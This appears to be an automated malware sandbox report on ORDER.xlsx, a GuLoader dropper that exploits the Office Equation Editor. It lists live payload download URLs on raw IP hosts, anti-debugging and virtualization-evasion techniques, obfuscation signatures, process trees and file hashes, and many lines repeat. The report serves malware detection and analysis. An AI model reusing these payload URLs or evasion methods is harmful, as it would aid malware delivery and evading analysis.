0x0000008d mov edx, dword ptr [edx] 0x0000008f lfence 0x00000092 jmp 00007FF3F0AF739Ah 0x00000094 test ax, cx 0x00000097 cmp ecx, edx 0x00000099 test ebx, eax 0x0000009b cmp edx, 8B44DCE9h 0x000000a1 ret 0x000000a2 mov esi, edx 0x000000a4 pushad 0x000000a5 rdtsc

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2852

Thread sleep time: -240000s >= -30000s

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_00369889 rdtsc

6_2_00369889

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_00369889 rdtsc

6_2_00369889

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003664E7 mov eax, dword ptr fs:[00000030h]	6_2_003664E7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003636BB mov eax, dword ptr fs:[00000030h]	6_2_003636BB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036929E mov eax, dword ptr fs:[00000030h]	6_2_0036929E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00364336 mov eax, dword ptr fs:[00000030h]	6_2_00364336
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A32B mov eax, dword ptr fs:[00000030h]	6_2_0036A32B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00368B74 mov eax, dword ptr fs:[00000030h]	6_2_00368B74
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003643BB mov eax, dword ptr fs:[00000030h]	6_2_003643BB

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Jump to behavior

Source: vbc.exe, 00000006.00000002.685686723.0000000000AC0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.685686723.0000000000AC0000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: vbc.exe, 00000006.00000002.685686723.0000000000AC0000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
212.192.246.25	unknown	Russian Federation		205220	RHC-HOSTINGGB	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://37.0.11.217/WEALTHYREM_ecIAnTt143.bin	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://212.192.246.25/reverse/vbc.exe	true	Avira URL Cloud: safe	unknown

AV Detection:

Found malware configuration

Source: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://37.0.11.217/WEALTHYREM_ecIAnTt143.bin"}

Multi AV Scanner detection for submitted file

Source: ORDER.xlsx	Virustotal: Detection: 28%			Perma Link
Source: ORDER.xlsx	ReversingLabs: Detection: 25%

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 212.192.246.25:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 212.192.246.25:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 67MB

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://37.0.11.217/WEALTHYREM_ecIAnTt143.bin

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: RHC-HOSTINGGB RHC-HOSTINGGB

Downloads executable code via HTTP

Source: global traffic

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25

Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: vbc.exe, 00000006.00000002.685967623.0000000003447000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.685967623.0000000003447000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.685967623.0000000003447000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.685967623.0000000003447000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: ED60BCE4.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe, 00000006.00000002.685967623.0000000003447000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ED60BCE4.emf

Jump to behavior

Source: global traffic

System Summary:

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003669E3	6_2_003669E3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036B43F	6_2_0036B43F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00363822	6_2_00363822
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036B412	6_2_0036B412
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00363008	6_2_00363008
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00365067	6_2_00365067
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00364C64	6_2_00364C64
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00364460	6_2_00364460
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036586D	6_2_0036586D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00369445	6_2_00369445
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036B494	6_2_0036B494
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A092	6_2_0036A092
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00363491	6_2_00363491
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00364C9F	6_2_00364C9F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00369C9B	6_2_00369C9B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00365485	6_2_00365485
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036B883	6_2_0036B883
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003654F8	6_2_003654F8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00365CE0	6_2_00365CE0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036B4D9	6_2_0036B4D9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A538	6_2_0036A538
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036B52D	6_2_0036B52D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036391F	6_2_0036391F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036510B	6_2_0036510B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036B57C	6_2_0036B57C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00369D66	6_2_00369D66
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036595D	6_2_0036595D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003631BF	6_2_003631BF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003699AD	6_2_003699AD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00369D9B	6_2_00369D9B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00362D83	6_2_00362D83
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003631FB	6_2_003631FB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003651ED	6_2_003651ED
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003699EB	6_2_003699EB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003639D3	6_2_003639D3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003655D3	6_2_003655D3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00365DC0	6_2_00365DC0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00365A3F	6_2_00365A3F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A603	6_2_0036A603
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00362672	6_2_00362672
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00364AB7	6_2_00364AB7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003656BF	6_2_003656BF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003636BB	6_2_003636BB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A6A5	6_2_0036A6A5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003666AE	6_2_003666AE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036B6AF	6_2_0036B6AF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036AA94	6_2_0036AA94
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00369A84	6_2_00369A84
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00364AFC	6_2_00364AFC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003632EB	6_2_003632EB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003652D1	6_2_003652D1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00363AC5	6_2_00363AC5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00369ACD	6_2_00369ACD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00364336	6_2_00364336
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A739	6_2_0036A739
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A32B	6_2_0036A32B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00363710	6_2_00363710
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A710	6_2_0036A710
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00365B09	6_2_00365B09
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00369FBF	6_2_00369FBF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00362BBC	6_2_00362BBC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A3BD	6_2_0036A3BD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003643BB	6_2_003643BB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036B7A1	6_2_0036B7A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A7AB	6_2_0036A7AB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00369B9B	6_2_00369B9B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036938A	6_2_0036938A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00365789	6_2_00365789
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00365BF1	6_2_00365BF1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003623DA	6_2_003623DA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003653C3	6_2_003653C3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003633CF	6_2_003633CF

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003669E3 NtAllocateVirtualMemory,	6_2_003669E3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00366A43 NtAllocateVirtualMemory,	6_2_00366A43
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00366B38 NtAllocateVirtualMemory,	6_2_00366B38

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

PE file contains strange resources

Source: vbc[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior

Source: ORDER.xlsx	Virustotal: Detection: 28%
Source: ORDER.xlsx	ReversingLabs: Detection: 25%

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$ORDER.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVREDE6.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/27@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Source: Yara match

File source: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00419564 push esi; retn 000Ch	6_2_004196B9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00407A1A push edi; ret	6_2_00407BB6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405CE3 pushad ; ret	6_2_00405CE8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004060E5 push ds; ret	6_2_004060E6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00408903 push edi; retf	6_2_00408906
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00407B8C push edi; ret	6_2_00407BB6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036001A pushad ; retf	6_2_0036001C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036007A pushad ; retf	6_2_0036007C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00360E7A push 81D7EEE9h; ret	6_2_00360E80
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00362268 push ds; retf	6_2_00362276
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00361B92 push esp; retf	6_2_00361B95
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003603FD pushad ; retf	6_2_003603FE

Source: initial sample	Static PE information: section name: .text entropy: 7.10018192133
Source: initial sample	Static PE information: section name: .text entropy: 7.10018192133

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2852

Thread sleep time: -240000s >= -30000s

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_00369889 rdtsc

6_2_00369889

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_00369889 rdtsc

6_2_00369889

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003664E7 mov eax, dword ptr fs:[00000030h]	6_2_003664E7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003636BB mov eax, dword ptr fs:[00000030h]	6_2_003636BB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036929E mov eax, dword ptr fs:[00000030h]	6_2_0036929E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00364336 mov eax, dword ptr fs:[00000030h]	6_2_00364336
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A32B mov eax, dword ptr fs:[00000030h]	6_2_0036A32B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00368B74 mov eax, dword ptr fs:[00000030h]	6_2_00368B74
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003643BB mov eax, dword ptr fs:[00000030h]	6_2_003643BB

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Jump to behavior

Source: vbc.exe, 00000006.00000002.685686723.0000000000AC0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.685686723.0000000000AC0000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: vbc.exe, 00000006.00000002.685686723.0000000000AC0000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

ID:	482999
Product:	CloudBasic
Start time:	12:12:41
Start date:	14.09.2021
Sample:	ORDER.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	c82cca02226f7910cd552124c3cf6e7f
SHA1:	79214e25d81860d25a8e88df99d487394c029da1
SHA256:	5a9f905842cac5fabeb0719527960d0ff67d2c5fc88f163b4f2dcbb366fac62f
Filetype:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	4E7BC50BF6D2B8EF86A4C4926E049AD9	F5C4808765D3157BE4E56890370BD65877C3E056	EC482DE17E558209134FCBCA7223336509A9023AC929A666A597BF91DBAC339E
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\139565FE.png	PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced	E2267BEF7933F02C009EAEFC464EB83D	ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE	BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\19629329.png	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced	63A6CB15B2B8ECD64F1158F5C8FBDCC8	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\199B2685.png	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced	208FD40D2F72D9AED77A86A44782E9E2	216B99E777ED782BDC3BFD1075DB90DFDDABD20F	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
